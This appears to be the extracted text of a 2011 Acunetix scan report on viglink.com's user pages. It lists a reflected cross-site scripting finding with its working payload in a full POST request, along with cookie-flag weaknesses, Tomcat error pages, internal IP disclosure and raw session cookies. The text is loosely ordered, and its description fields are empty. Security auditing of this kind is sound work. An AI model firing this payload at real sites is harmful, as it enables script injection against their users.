Attack details URL encoded POST input email was set to " onmouseover=prompt(944494) bad=" The input is reflected inside a text element. The input is reflected inside a tag element between double quotes. ============================================================================= POST http://www.viglink.com:80/users/action/send-verification HTTP/1.1 Content-Length: 76 Content-Type: application/x-www-form-urlencoded Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=086124A0463191600BB354F21E6183FD Host: www.viglink.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* commit=Send%20Email&email=%22%20onmouseover%3dprompt%28944494%29%20bad%3d%22 Acunetix Website Audit 19 April, 2011 Detailed Scan Report Generated by Acunetix WVS Reporter (v7.0 Build 20110406) Scan of http://www.viglink.com:80/users/login Scan details Scan information Starttime 4/19/2011 1:46:25 PM Finish time 4/19/2011 1:47:25 PM Scan time 1 minutes, 1 seconds Profile Default Server information Responsive True Server banner Unknown Server OS Unknown Server Threat level Alerts distribution Total alerts 19 High 1 Medium 2 Low 2 Informationa 14 Knowledge base List of file extensions List of files with inputs List of external hosts Acunetix Website Audit 2 List of email addresses Alerts summary Cross Site Scripting Affects Variation /users/action/send-verification 1 Insecure transition from HTTP to HTTPS in form post Affects Variation /users/login 1 /users/login (913e79c9199f7fe8d65119d9defbe129) 1 Session Cookie without HttpOnly flag set Affects Variation / 1 Session Cookie without Secure flag set Affects Variation / 1 Email address found Affects Variation /users/action/ 1 /users/login 1 /users/queued 1 /users/send-verification 1 /users/signup 1 GHDB: Apache Tomcat Error message Affects Variation /users/action/login 1 /users/action/send-verification 1 /users/action/signup 1 GHDB: Possible login page Affects Variation /users/login (913e79c9199f7fe8d65119d9defbe129) 1 Acunetix Website Audit 3 Possible internal IP address disclosure Affects Variation /users/action/ 1 /users/login 1 /users/queued 1 /users/send-verification 1 /users/signup 1 Acunetix Website Audit 4 Alert details Cross Site Scripting Severity High Type Validation Reported by module Scripting (XSS.script) Description Impact Recommendation Affected items /users/action/send-verification Details Request POST /users/action/send-verification HTTP/1.1 Content-Length: 76 Content-Type: application/x-www-form-urlencoded Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=086124A0463191600BB354F21E6183FD Host: www.viglink.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* commit=Send%20Email&email=%22%20onmouseover%3dprompt%28944494%29%20bad%3d%22 Response HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Tue, 19 Apr 2011 18:46:03 GMT Expires: -1 Pragma: no-cache Vary: Accept-Encoding Content-Length: 5661 Connection: keep-alive Insecure transition from HTTP to HTTPS in form post Acunetix Website Audit 5 Severity Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Tue, 19 Apr 2011 18:45:43 GMT Expires: -1 Pragma: no-cache Vary: Accept-Encoding Content-Length: 5546 Session Cookie without HttpOnly flag set Severity Low Type Informational Reported by module Crawler Description Impact Recommendation Affected items / Details Request GET / HTTP/1.1 Response Session Cookie without Secure flag set Severity Low Type Informational Reported by module Crawler Description Impact Recommendation Affected items Acunetix Website Audit 7 / Details Request GET / HTTP/1.1 Response Email address found Severity Informational Type Informational Reported by module Scripting (Invalid_Page_Text_Search.script) Description Impact Recommendation Affected items /users/action/ Details Request GET /users/action/yKMyGQDHXO.jsp HTTP/1.1 Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=086124A0463191600BB354F21E6183FD Host: www.viglink.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* Response HTTP/1.1 404 Not Found Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Tue, 19 Apr 2011 18:45:54 GMT Expires: -1 Pragma: no-cache Vary: Accept-Encoding Content-Length: 5060 Connection: keep-alive Acunetix Website Audit 8 /users/login Details Request GET /users/login HTTP/1.1 Pragma: no-cache Host: www.viglink.com Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* Response HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Tue, 19 Apr 2011 18:45:43 GMT Expires: -1 Pragma: no-cache Set-Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; Domain=.viglink.com; Expires=Fri, 16-Apr- 2021 18:45:43 GMT; Path=/ Set-Cookie: JSESSIONID=0A76B9A6D1C020A6172FB4321913CC5C; Path=/ Vary: Accept-Encoding Content-Length: 5393 Connection: keep-alive /users/queued Details Request GET /users/queued HTTP/1.1 Pragma: no-cache Referer: http://www.viglink.com/users/action/signup Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=086124A0463191600BB354F21E6183FD Host: www.viglink.com Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* Response HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Tue, 19 Apr 2011 18:45:44 GMT Expires: -1 Pragma: no-cache Vary: Accept-Encoding Content-Length: 5156 Connection: keep-alive Acunetix Website Audit 9 /users/send-verification Details Request GET /users/send-verification HTTP/1.1 Pragma: no-cache Referer: http://www.viglink.com/users/login Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=0A76B9A6D1C020A6172FB4321913CC5C Host: www.viglink.com Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* Response HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Tue, 19 Apr 2011 18:45:43 GMT Expires: -1 Pragma: no-cache Set-Cookie: JSESSIONID=72C84109BEF23B770007DB80460291AA; Path=/ Vary: Accept-Encoding Content-Length: 5434 Connection: keep-alive /users/signup Details Request GET /users/signup HTTP/1.1 Pragma: no-cache Referer: http://www.viglink.com/users/login Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=0A76B9A6D1C020A6172FB4321913CC5C Host: www.viglink.com Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* Response HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Tue, 19 Apr 2011 18:45:43 GMT Expires: -1 Pragma: no-cache Set-Cookie: JSESSIONID=4168FFF7D563098687600BB7AB7390F7; Path=/ Vary: Accept-Encoding Content-Length: 5875 Connection: keep-alive GHDB: Apache Tomcat Error message Acunetix Website Audit 10 Severity Informational Type Informational Reported by module GHDB Description Impact Recommendation Affected items /users/action/login Details Request GET /users/action/login HTTP/1.1 Pragma: no-cache Referer: http://www.viglink.com/users/login Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=171DEA4D3ABA00598E0AA414EAF7746E Host: www.viglink.com Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* Response HTTP/1.0 403 Forbidden Date: Tue, 19 Apr 2011 18:45:43 GMT Expires: -1 Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: JSESSIONID=D76D2B4D4BCF3D4EEB25570AA6F37A61; Path=/; Secure Content-Type: text/html;charset=utf-8 Content-Length: 964 Vary: Accept-Encoding Connection: close /users/action/send-verification Details Request GET /users/action/send-verification HTTP/1.1 Pragma: no-cache Referer: http://www.viglink.com/users/send-verification Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=8CB2B4339D6EB320000567986AEF882D Acunetix Website Audit 11 Host: www.viglink.com Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Response HTTP/1.1 403 Forbidden Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html;charset=utf-8 Date: Tue, 19 Apr 2011 18:45:44 GMT Expires: -1 Pragma: no-cache Vary: Accept-Encoding Content-Length: 964 Connection: keep-alive /users/action/signup Details Request GET /users/action/signup HTTP/1.1 Pragma: no-cache Referer: http://www.viglink.com/users/signup Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=EB9077C39A3F1BC4C6FCB2E27842B446 Host: www.viglink.com Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* Response HTTP/1.1 403 Forbidden Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html;charset=utf-8 Date: Tue, 19 Apr 2011 18:45:43 GMT Expires: -1 Pragma: no-cache Set-Cookie: JSESSIONID=8CB2B4339D6EB320000567986AEF882D; Path=/ Vary: Accept-Encoding Content-Length: 964 Connection: keep-alive GHDB: Possible login page Severity Informational Type Informational Reported by module GHDB Description Impact Acunetix Website Audit 12 Recommendation Affected items /users/login (913e79c9199f7fe8d65119d9defbe129) Details Request GET /users/login?_ek=bn&ar=/users/action HTTP/1.1 Pragma: no-cache Referer: http://www.viglink.com/users/action Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=EB9077C39A3F1BC4C6FCB2E27842B446 Host: www.viglink.com Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* Response HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Tue, 19 Apr 2011 18:45:43 GMT Expires: -1 Pragma: no-cache Vary: Accept-Encoding Content-Length: 5546 Connection: keep-alive Possible internal IP address disclosure Severity Informational Type Informational Reported by module Scripting (Invalid_Page_Text_Search.script) Description Impact Recommendation Affected items /users/action/ Details Acunetix Website Audit 13 Request GET /users/action/yKMyGQDHXO.jsp HTTP/1.1 Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=086124A0463191600BB354F21E6183FD Host: www.viglink.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* Response HTTP/1.1 404 Not Found Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Tue, 19 Apr 2011 18:45:54 GMT Expires: -1 Pragma: no-cache Vary: Accept-Encoding Content-Length: 5060 Connection: keep-alive /users/login Details Request GET /users/login HTTP/1.1 Pragma: no-cache Host: www.viglink.com Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* Response HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Tue, 19 Apr 2011 18:45:43 GMT Expires: -1 Pragma: no-cache Set-Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; Domain=.viglink.com; Expires=Fri, 16-Apr- 2021 18:45:43 GMT; Path=/ Set-Cookie: JSESSIONID=0A76B9A6D1C020A6172FB4321913CC5C; Path=/ Vary: Accept-Encoding Content-Length: 5393 Connection: keep-alive /users/queued Details Request GET /users/queued HTTP/1.1 Pragma: no-cache Referer: http://www.viglink.com/users/action/signup Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=086124A0463191600BB354F21E6183FD Host: www.viglink.com Acunetix Website Audit 14 Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Response HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Tue, 19 Apr 2011 18:45:44 GMT Expires: -1 Pragma: no-cache Vary: Accept-Encoding Content-Length: 5156 Connection: keep-alive /users/send-verification Details Request GET /users/send-verification HTTP/1.1 Pragma: no-cache Referer: http://www.viglink.com/users/login Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=0A76B9A6D1C020A6172FB4321913CC5C Host: www.viglink.com Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* Response HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Tue, 19 Apr 2011 18:45:43 GMT Expires: -1 Pragma: no-cache Set-Cookie: JSESSIONID=72C84109BEF23B770007DB80460291AA; Path=/ Vary: Accept-Encoding Content-Length: 5434 Connection: keep-alive /users/signup Details Request GET /users/signup HTTP/1.1 Pragma: no-cache Referer: http://www.viglink.com/users/login Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=0A76B9A6D1C020A6172FB4321913CC5C Host: www.viglink.com Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* Response HTTP/1.1 200 OK Acunetix Website Audit 15 Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Tue, 19 Apr 2011 18:45:43 GMT Expires: -1 Pragma: no-cache Set-Cookie: JSESSIONID=4168FFF7D563098687600BB7AB7390F7; Path=/ Vary: Accept-Encoding Content-Length: 5875 Acunetix Website Audit 16